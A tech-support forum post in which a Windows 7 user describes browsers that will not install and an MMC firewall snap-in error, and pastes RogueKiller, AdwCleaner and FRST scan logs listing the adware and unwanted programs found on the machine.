
MMC error & can't start browsing


  • This topic is locked
3 replies to this topic

#1 VickyPratama


Posted 26 July 2015 - 07:25 AM

I'm sorry if my English is not good...

I have a problem with my browsers. I can't install all my browsers: Mozilla, Chrome, or Opera. And my Internet Explorer is gone too from my taskbar. But I have an internet connection with Wi-Fi. I got this problem after I installed Free AVG anti-virus. I didn't know about it. I tried to change my administrator, uninstall AVG, and other little things. When I see the solution on my friend's PC, I think maybe it is because of my MMC. If I go into my firewall advanced settings and try to click on inbound or outbound rules, I get an error that says "MMC has detected an error in a snap-in and will unload it." If I press "Unload the snap-in and continue running", I get "FX:{b05566ac-fe9c-4368-be02-7a4cbb7cbe11}" The requested service provider could not be loaded or initialized. Exception type: System.Net.Sockets.SocketException. These are the only problems that I have caught so far. Please help. The last solution I tried was with RogueKiller and AdwCleaner. This is the result:

 

ROGUEKILLER

RogueKiller V10.9.3.0 [Jul 21 2015] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7600 ) 32 bits version
Started in : Normal mode
User : Cucuk [Administrator]
Started from : C:\Users\Cucuk\Desktop\RogueKiller (1).exe
Mode : Delete -- Date : 07/26/2015 15:18:17

¤¤¤ Processes : 10 ¤¤¤
[PUP] ProtectWindowsManager.exe(1816) -- C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe[7] -> Killed [TermProc]
[Suspicious.Path] TSVulFW.DAT(1988) -- C:\ProgramData\Tencent\TSVulFw\TSVulFW.DAT[7] -> Unloaded
[PUP] (SVC) cherimoya -- system32\drivers\cherimoya.sys[7] -> ERROR [41c]
[PUP] (SVC) nethfdrv -- \??\C:\Windows\system32\drivers\nethfdrv.sys[7] -> Stopped
[PUP] (SVC) QMUdisk -- \??\C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMUdisk.sys[7] -> ERROR [41c]
[PUP] (SVC) QQPCRTP -- "C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QQPCRTP.exe" -r[7] -> ERROR [41c]
[PUP] (SVC) TAOAccelerator -- \??\C:\Windows\system32\Drivers\TAOAccelerator.sys[7] -> Stopped
[PUP] (SVC) TS888 -- \??\C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TS888.sys[7] -> Stopped
[PUP] (SVC) TSDefenseBt -- system32\DRIVERS\TSDefenseBt.sys[7] -> Stopped
[PUP] (SVC) TSSysKit -- \??\C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TSSysKit.sys[7] -> ERROR [41c]

¤¤¤ Registry : 56 ¤¤¤

¤¤¤ Tasks : 3 ¤¤¤
[Suspicious.Path] %WINDIR%\Tasks\AmiUpdXp.job -- C:\Users\Cukwenk\AppData\Local\14536\Updater.exe -> Not selected
[Suspicious.Path] %WINDIR%\Tasks\Run_Dregol.job -- C:\Users\Cukwenk\AppData\Local\{8550B~1\UNINST~1.EXE (/Check) -> Not selected
[Suspicious.Path] %WINDIR%\Tasks\TuneInPro.job -- c:\programdata\{c9a57a36-327b-fad7-c9a5-57a36327e8d8}\setup.exe (--startup=1 --single) -> Not selected

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 16 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: TOSHIBA MQ01ABD050 +++++
--- User ---
[MBR] 84b25dd5f7a5e29d5b46db54f9949e27
[BSP] b72e9200b9136a918fb7dbb4ef5dc48b : Windows Vista/7/8 MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 106838 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 219011072 | Size: 185000 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
3 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 597891072 | Size: 185000 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK
 

ADWCLEANER

# AdwCleaner v4.208 - Logfile created 26/07/2015 at 15:19:46
# Updated 09/07/2015 by Xplode
# Database : 2015-07-09.2 [Local]
# Operating system : Windows 7 Ultimate  (x86)
# Username : Cucuk - CUKWENK-PC
# Running from : C:\Users\Cucuk\Desktop\adwcleaner_4.208.exe
# Option : Scan

***** [ Services ] *****


***** [ Files / Folders ] *****


***** [ Scheduled tasks ] *****


***** [ Shortcuts ] *****

Shortcut Infected : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk

***** [ Registry ] *****

Data Found : HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\OperaStable\shell\open\command [(Default)] - "C:\Program Files\Opera\Launcher.exe" hxxp://www.mystartsearch.com/?type=sc&ts=1437867583&z=1c2fdf7b00bd15fcb05f74fgfz6c6mfm3tdt8g2c6g&from=cmi&uid=TOSHIBAXMQ01ABD050_62IJS463SXX62IJS463S
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IMBoosterARP
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IminentToolbar
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\inethnfd
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Jungle Net
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Linkey
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mystartsearch uninstall
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SearchProtect
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Vosteran.com
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WajIntEnhance
Key Found : HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10
Key Found : HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4
Key Found : HKLM\SOFTWARE\mystartsearchSoftware
Key Found : HKLM\SOFTWARE\SavePass 1.1
Key Found : HKLM\SOFTWARE\SavePass 1.1
Key Found : HKLM\SOFTWARE\SavePass 1.1
Key Found : HKLM\SOFTWARE\SearchProtect
Key Found : HKLM\SOFTWARE\searchult
Key Found : HKLM\SOFTWARE\shopperz
Key Found : HKLM\SOFTWARE\SpeedBit
Key Found : HKLM\SOFTWARE\SupDp
Key Found : HKLM\SOFTWARE\SupTab
Key Found : HKLM\SOFTWARE\supWindowsMangerProtect
Key Found : HKLM\SOFTWARE\systweak
Key Found : HKLM\SOFTWARE\Tutorials
Key Found : HKLM\SOFTWARE\WajIntEnhance
Key Found : HKLM\SOFTWARE\YorkNewCin
Key Found : HKLM\SOFTWARE\ZoomWebLists
Key Found : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\QQPCRTP
Key Found : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Oexufafono
Key Found : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\QQPCRTP
Key Found : HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\WindowsMangerProtect
Key Found : HKU\.DEFAULT\Software\CinemaPlus-3.2cV05.07-nv
Key Found : HKU\.DEFAULT\Software\CinemaPlus-3.2cV05.07-nv-ie
Value Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [gmsd_ra_005010022]

***** [ Web browsers ] *****

-\\ Internet Explorer v8.0.7600.16385

Setting Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL] - hxxp://www.mystartsearch.com/?type=hp&ts=1437867583&z=1c2fdf7b00bd15fcb05f74fgfz6c6mfm3tdt8g2c6g&from=cmi&uid=TOSHIBAXMQ01ABD050_62IJS463SXX62IJS463S
Setting Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\AboutURls [Tabs] - hxxp://www.dregol.com/?f=2&a=drg_popjar_15_29&cd=2XzuyEtN2Y1L1QzuyByE0EyDyEtAyEzyyB0C0CzyyB0FyBtDtN0D0Tzu0StCtBzzzytN1L2XzutAtFtCtBtFtCtFtCtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyDzztCyDyCyCtBtBtGyD0EyCzztG0CtB0E0FtGyCyEtC0FtG0B0CyB0AtD0D0AyCtC0AyCyB2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0CtB0DtBtCtD0BtG0CyE0CtAtGyEyC0DyEtG0AyC0AtCtG0D0EtByDtCtAyE0C0Bzy0ByD2QtN0A0LzuyEtN1B2Z1V1T1S1NzuzzyDyB&cr=2073729538&ir=

-\\ Google Chrome v44.0.2403.107

[C:\Users\Cucuk\AppData\Local\Google\Chrome\User Data\Default\Web data] - Found [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
[C:\Users\Cucuk\AppData\Local\Google\Chrome\User Data\Default\Web data] - Found [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}

*************************

AdwCleaner[R0].txt - [22841 bytes] - [26/07/2015 09:34:36]
AdwCleaner[R1].txt - [22761 bytes] - [26/07/2015 15:19:46]

########## EOF - C:\AdwCleaner\AdwCleaner[R1].txt - [22821 bytes] ##########
 

FRST 32 bit

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 25-07-2015
Ran by Cucuk (administrator) on CUKWENK-PC (26-07-2015 15:28:16)
Running from C:\Users\Cucuk\Desktop
Loaded Profiles: Cucuk (Available Profiles: Cucuk)
Platform: Microsoft Windows 7 Ultimate  (X86) Language: English (United States)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Tencent) C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QQPCRTP.exe
(Beijing Rising Information Technology Co., Ltd.) C:\Program Files\Rising\RSD\RsMgrSvc.exe
(Beijing Rising Information Technology Co., Ltd.) C:\Program Files\Rising\RAV\ravmond.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files\CD674440-1437866985-11E1-8EA2-047D7BFA1DE9\hnso7C13.tmp
(Conexant Systems Inc.) C:\Windows\System32\CxAudMsg32.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
(Absolute Software Corp.) C:\Windows\System32\rpcnet.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(Tencent) C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QQPCTray.exe
(Tencent) C:\Program Files\Common Files\Tencent\QQDownload\130\Tencentdl.exe
(Alcor Micro Corp.) C:\Program Files\AmIcoSingLun\AmIcoSinglun.exe
(SRS Labs, Inc.) C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Intel Corporation) C:\Program Files\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(Beijing Rising Information Technology Co., Ltd.) C:\Program Files\Rising\RSD\popwndexe.exe
(Beijing Rising Information Technology Co., Ltd.) C:\Program Files\Rising\RAV\rstray.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(globalUpdate) C:\Program Files\globalUpdate\Update\globalupdate.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
(Beijing Rising Information Technology Co., Ltd.) C:\Program Files\Rising\RAV\rsconfig.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [AmIcoSinglun] => C:\Program Files\AmIcoSingLun\AmIcoSinglun.exe [272984 2011-12-21] (Alcor Micro Corp.)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [612256 2011-11-25] (TOSHIBA Corporation)
HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SACpl.exe [1654400 2012-02-21] (Conexant Systems, Inc.)
HKLM\...\Run: [SRS Premium Sound HD] => C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel.exe [1558392 2012-03-22] (SRS Labs, Inc.)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2321680 2011-12-22] (Synaptics Incorporated)
HKLM\...\Run: [USB3MON] => C:\Program Files\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-02-26] (Intel Corporation)
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [542640 2011-09-22] (TOSHIBA Corporation)
HKLM\...\Run: [TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [854400 2011-12-13] (TOSHIBA Corporation)
HKLM\...\Run: [gmsd_ra_005010022] => "C:\Program Files\gmsd_ra_005010022\gmsd_ra_005010022.exe"
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation)
HKLM\...\Run: [gmsd_ra_005010026] => [X]
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [507776 2014-10-07] (Oracle Corporation)
HKLM\...\Run: [gmsd_ra_005010030] => [X]
HKLM\...\Run: [ QQPCTray] => C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QQPCTRAY.EXE [355296 2015-07-25] (Tencent)
HKLM\...\Run: [RSDTRAY] => C:\Program Files\Rising\RSD\popwndexe.exe [126808 2012-09-24] (Beijing Rising Information Technology Co., Ltd.)
HKLM\...\Run: [RavTRAY] => C:\Program Files\Rising\RAV\RSTRAY.EXE [111000 2014-05-14] (Beijing Rising Information Technology Co., Ltd.)
AppInit_DLLs: c:\progra~2\{9a227~1\201~1.9\cina.dll => c:\ProgramData\{9A2272E1-CAA0-A367-7B26-D3E5ABA4006B}\2.0.1.9\cina.dll [606720 2015-07-14] ()
Startup: C:\Users\Cukwenk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk [2015-07-08]
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
ShellIconOverlayIdentifiers: [.QMDeskTopGCIcon] -> {B7667919-3765-4815-A66D-98A09BE662D6} => C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMGCShellExt.dll [2015-07-25] (Tencent)
BootExecute: autocheck autochk *  bsmain
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://hao.qq.com/?unc=o400493_1&s=o400493_1
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.mystartsearch.com/?type=hp&ts=1437867583&z=1c2fdf7b00bd15fcb05f74fgfz6c6mfm3tdt8g2c6g&from=cmi&uid=TOSHIBAXMQ01ABD050_62IJS463SXX62IJS463S
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-3110752661-1710530649-2414096437-1001\Software\Microsoft\Internet Explorer\Main,Start Page = http://hao.qq.com/?unc=o400493_1&s=o400493_1
SearchScopes: HKLM -> OldSearch URL = http://www.mystartsearch.com/web/?type=ds&ts=1436221281&z=99d786b44a0d0b302bdc465g8z0c3q5gbw7o8b8b8o&from=cmi&uid=TOSHIBAXMQ01ABD050_62IJS463SXX62IJS463S&q={searchTerms}
SearchScopes: HKLM -> {c9ab6446-7efc-47fe-966c-dc54324eff9f} URL =
SearchScopes: HKU\S-1-5-21-3110752661-1710530649-2414096437-1001 -> DefaultScope {5CE25775-92B7-477d-9603-852F0B34D8B0} URL = http://www.sogou.com/sogou?query={searchTerms}&pid=sogou-wsse-91e50fe1e39af286
SearchScopes: HKU\S-1-5-21-3110752661-1710530649-2414096437-1001 -> {5CE25775-92B7-477d-9603-852F0B34D8B0} URL = http://www.sogou.com/sogou?query={searchTerms}&pid=sogou-wsse-91e50fe1e39af286
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2006-10-27] (Microsoft Corporation)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704 2011-08-30] (Apple Inc.)
Winsock: Catalog9 01 C:\Windows\system32\Oexufafono.dll File not found
Winsock: Catalog9 02 C:\Windows\system32\Oexufafono.dll File not found
Winsock: Catalog9 03 C:\Windows\system32\Oexufafono.dll File not found
Winsock: Catalog9 04 C:\Windows\system32\Oexufafono.dll File not found
Winsock: Catalog9 15 C:\Windows\system32\Oexufafono.dll File not found
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{A7D48C64-69A3-46AA-994C-65175C92BBFB}: [DhcpNameServer] 192.168.1.1
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_18_0_0_209.dll [2015-07-22] ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
FF Plugin: @iqiyi.com/npWebPlayer -> C:\IQIYI Video\LStyle\npWebPlayer.dll No File
FF Plugin: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2015-07-14] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2015-07-14] (Oracle Corporation)
FF Plugin: @qq.com/QQPCMgr -> C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\npQMExtensionsMozilla.dll [2015-07-25] (Tencent Technology (Shenzhen) Company Limited)
FF Plugin: @rising.com.cn/nprising -> C:\Program Files\Rising\RAV\nprising.dll [2013-06-26] (Beijing Rising Information Technology Co., Ltd.)
FF Plugin: @staging.google.com/globalUpdate Update;version=10 -> C:\Program Files\globalUpdate\Update\1.3.25.0\npglobalupdateUpdate4.dll [2015-07-14] (globalUpdate)
FF Plugin: @staging.google.com/globalUpdate Update;version=4 -> C:\Program Files\globalUpdate\Update\1.3.25.0\npglobalupdateUpdate4.dll [2015-07-14] (globalUpdate)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-07-25] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-07-25] (Google Inc.)
FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2014-12-02] (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{3c9ce603-44cc-4997-a166-239e6186c6ef}] - C:\Program Files\shopperz\Firefox
FF Extension: shopperz - C:\Program Files\shopperz\Firefox [2015-07-06]
FF HKLM\...\Firefox\Extensions: [defsearchp@gmail.com] - C:\Users\Cukwenk\AppData\Roaming\Mozilla\Firefox\Profiles\4bihiz7l.default\extensions\defsearchp@gmail.com
FF Extension: Default SearchProtected  - C:\Users\Cukwenk\AppData\Roaming\Mozilla\Firefox\Profiles\4bihiz7l.default\extensions\defsearchp@gmail.com [2015-07-25]
FF HKLM\...\Firefox\Extensions: [deskCutv2@gmail.com] - C:\Users\Cukwenk\AppData\Roaming\Mozilla\Firefox\Profiles\4bihiz7l.default\extensions\deskCutv2@gmail.com
FF Extension: deskCut - C:\Users\Cukwenk\AppData\Roaming\Mozilla\Firefox\Profiles\4bihiz7l.default\extensions\deskCutv2@gmail.com [2015-07-25]
FF ExtraCheck: C:\Program Files\mozilla firefox\browser\defaults\preferences\prefs.js [2015-07-22]

Chrome:
=======
CHR Profile: C:\Users\Cucuk\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Docs) - C:\Users\Cucuk\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-07-25]
CHR Extension: (Google Drive) - C:\Users\Cucuk\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-07-25]
CHR Extension: (YouTube) - C:\Users\Cucuk\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-07-25]
CHR Extension: (Google Search) - C:\Users\Cucuk\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-07-25]
CHR Extension: (Gmail) - C:\Users\Cucuk\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-25]
CHR HKLM\...\Chrome\Extension: [ihokndmjeombjojnfkmapfnjeghjohim] - https://clients2.google.com/service/update2/crx

Opera:
=======
StartMenuInternet: (HKLM) OperaStable - C:\Program Files\Opera\Launcher.exe http://www.mystartsearch.com/?type=sc&ts=1437867583&z=1c2fdf7b00bd15fcb05f74fgfz6c6mfm3tdt8g2c6g&from=cmi&uid=TOSHIBAXMQ01ABD050_62IJS463SXX62IJS463S

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 comyninu; C:\Program Files\CD674440-1437866985-11E1-8EA2-047D7BFA1DE9\hnso7C13.tmp [161792 2015-07-25] () [File not signed]
R2 CxAudMsg; C:\Windows\system32\CxAudMsg32.exe [190592 2010-12-17] (Conexant Systems Inc.)
S2 globalUpdate; C:\Program Files\globalUpdate\Update\globalupdate.exe [68608 2015-07-14] (globalUpdate) [File not signed] <==== ATTENTION
S3 globalUpdatem; C:\Program Files\globalUpdate\Update\globalupdate.exe [68608 2015-07-14] (globalUpdate) [File not signed] <==== ATTENTION
S2 gupdate1d0c79a30a3dacf; C:\Program Files\Google\Update\GoogleUpdate.exe [107848 2015-07-25] (Google Inc.)
S3 gupdatem1d0c79a30da9a75; C:\Program Files\Google\Update\GoogleUpdate.exe [107848 2015-07-25] (Google Inc.)
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-03] (Macrovision Corporation) [File not signed]
S4 IHProtect Service; C:\Program Files\MiuiTab\ProtectService.exe [125112 2015-06-23] (XTab system)
S3 Oexufafono; C:\Program Files\shopperz\Oexufafono.exe [2020864 2015-06-23] () [File not signed]
R2 QQPCRTP; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QQPCRTP.exe [297608 2015-07-25] (Tencent)
R2 rpcnet; C:\Windows\system32\rpcnet.exe [78032 2015-06-30] (Absolute Software Corp.)
R2 RsMgrSvc; C:\Program Files\Rising\RSD\RsMgrSvc.exe [184088 2015-05-20] (Beijing Rising Information Technology Co., Ltd.)
R2 RsRavMon; C:\Program Files\Rising\RAV\ravmond.exe [277552 2014-05-14] (Beijing Rising Information Technology Co., Ltd.)
S3 TAOFrame; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TAOFrame.exe [293856 2015-07-25] (Tencent)
R3 TOSHIBA HDD SSD Alert Service; C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [112552 2011-11-25] (TOSHIBA Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2009-07-13] (Microsoft Corporation)
S2 WindowsMangerProtect; C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe [707240 2015-07-25] (DTools LIMITED) <==== ATTENTION
S2 426ab601; "C:\Windows\system32\rundll32.exe" "c:\Program Files\TrimEdit\TrimEdit.dll",serv
S2 gopibeko; C:\Users\Cukwenk\AppData\Local\CD674440-1437823846-11E1-8EA2-047D7BFA1DE9\snsjB19.tmp [X]
S2 lewunutu; C:\Program Files\CD674440-1437866985-11E1-8EA2-047D7BFA1DE9\knst3136.tmpfs [X]
S2 NetHttpService; C:\Windows\system32\nethtsrv.exe [X]
S2 remidiju; C:\Program Files\CD674440-1436220497-11E1-8EA2-047D7BFA1DE9\knseEA1D.tmp [X]
S2 ServiceUpdater; C:\Windows\system32\netupdsrv.exe [X]
S2 UfockFuloxo; "C:\Program Files\shopperz\LikumVutyp.exe" -cmd [X]
S2 vicoqudu; C:\Users\Cukwenk\AppData\Roaming\CD674440-1436220497-11E1-8EA2-047D7BFA1DE9\hnsg463B.tmp [X]
S2 zejytose; C:\Users\Cukwenk\AppData\Roaming\CD674440-1436881159-11E1-8EA2-047D7BFA1DE9\jnsrDD0E.tmp [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 athr; C:\Windows\System32\DRIVERS\athr.sys [2239488 2012-04-19] (Qualcomm Atheros Communications, Inc.)
R1 cherimoya; C:\Windows\System32\drivers\cherimoya.sys [56344 2015-06-18] (Cherimoya Ltd)
R0 iusb3hcs; C:\Windows\System32\DRIVERS\iusb3hcs.sys [13592 2012-02-26] (Intel Corporation)
R3 iusb3hub; C:\Windows\System32\DRIVERS\iusb3hub.sys [348440 2012-02-26] (Intel Corporation)
R3 iusb3xhc; C:\Windows\System32\DRIVERS\iusb3xhc.sys [792856 2012-02-26] (Intel Corporation)
R1 kguard; C:\Windows\System32\DRIVERS\kguard.sys [77080 2015-05-14] (Beijing Rising Information Technology Co., Ltd.)
S1 nethfdrv; C:\Windows\system32\drivers\nethfdrv.sys [40528 2015-06-18] (nethfdrv)
S3 qcusbser-forge; C:\Windows\System32\DRIVERS\qcusbser.sys [214080 2015-06-17] (FORGE Incorporated)
S3 qcusbwwan-forge; C:\Windows\System32\DRIVERS\qcusbwwan.sys [422976 2015-06-17] (FORGE Incorporated)
R1 QMIEProtect; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMIEProtect.sys [49464 2015-07-25] ()
R1 QMUdisk; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMUdisk.sys [62392 2015-07-25] (Tencent)
R2 QQSysMon; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QQSysMon.sys [108472 2015-07-25] (电脑管家)
R2 rsdsys; C:\Windows\system32\drivers\protreg.sys [24120 2014-05-27] (Beijing Rising Information Technology Co., Ltd.)
R1 rsutils; C:\Windows\System32\DRIVERS\rsutils.sys [83384 2015-04-08] (Beijing Rising Information Technology Co., Ltd.)
R3 SmbDrv; C:\Windows\System32\DRIVERS\Smb_driver.sys [20240 2011-12-22] (Synaptics Incorporated)
R0 sysmon; C:\Windows\System32\DRIVERS\sysmon.sys [157896 2015-04-29] (Beijing Rising Information Technology Co., Ltd.)
U2 TAOAccelerator; C:\Windows\system32\Drivers\TAOAccelerator.sys [77016 2015-07-25] (Tencent)
R2 TAOKernelDriver; C:\Windows\system32\Drivers\TAOKernel.sys [138552 2015-07-25] (Tencent Technology(Shenzhen) Company Limited)
R3 TFsFlt; C:\Windows\System32\Drivers\TFsFlt.sys [150072 2015-07-25] (电脑管家)
S3 TS888; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TS888.sys [30392 2015-07-26] (Tencent)
R1 TSCPM; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\tscpm.sys [43448 2015-07-25] (电脑管家)
S1 TSDefenseBt; C:\Windows\System32\DRIVERS\TSDefenseBt.sys [14008 2015-07-25] (Tencent)
R0 TsFltMgr; C:\Windows\System32\drivers\TsFltMgr.sys [124792 2015-07-25] (电脑管家)
